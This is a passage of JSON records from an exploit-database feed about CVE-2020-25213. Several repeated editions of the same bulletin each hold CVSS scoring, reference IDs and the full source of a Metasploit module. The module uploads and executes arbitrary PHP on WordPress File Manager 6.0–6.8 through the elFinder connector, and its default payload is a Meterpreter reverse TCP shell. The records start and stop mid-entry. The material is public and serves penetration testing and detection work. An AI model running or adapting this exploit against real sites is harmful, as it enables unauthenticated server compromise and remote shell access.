["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-11T22:45:21", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-11T22:45:21", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-15] #", "category": "", "verified": false}, "lastseen": "2021-09-14T22:17:45", "differentElements": ["sourceData"], "edition": 15}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "2e2bd7dd95fb2314b61627e2e23e433d", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-15T23:28:02", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-15T23:28:02", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-15T23:28:02", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-16] #", "category": "", "verified": false}, "lastseen": "2021-09-15T23:28:02", "differentElements": ["sourceData"], "edition": 16}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "75078d57465ed42871050632c2beb640", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-16T22:23:56", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-16T22:23:56", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-16T22:23:56", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-17] #", "category": "", "verified": false}, "lastseen": "2021-09-16T22:23:56", "differentElements": ["sourceData"], "edition": 17}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "c446a9d53479741bec538375f9a4d5a2", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-21T00:25:31", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-21T00:25:31", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-21T00:25:31", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-21] #", "category": "", "verified": false}, "lastseen": "2021-09-21T00:25:31", "differentElements": ["sourceData"], "edition": 18}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "cd3c9cf5239e706d6bbae613b48a9f5a", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, 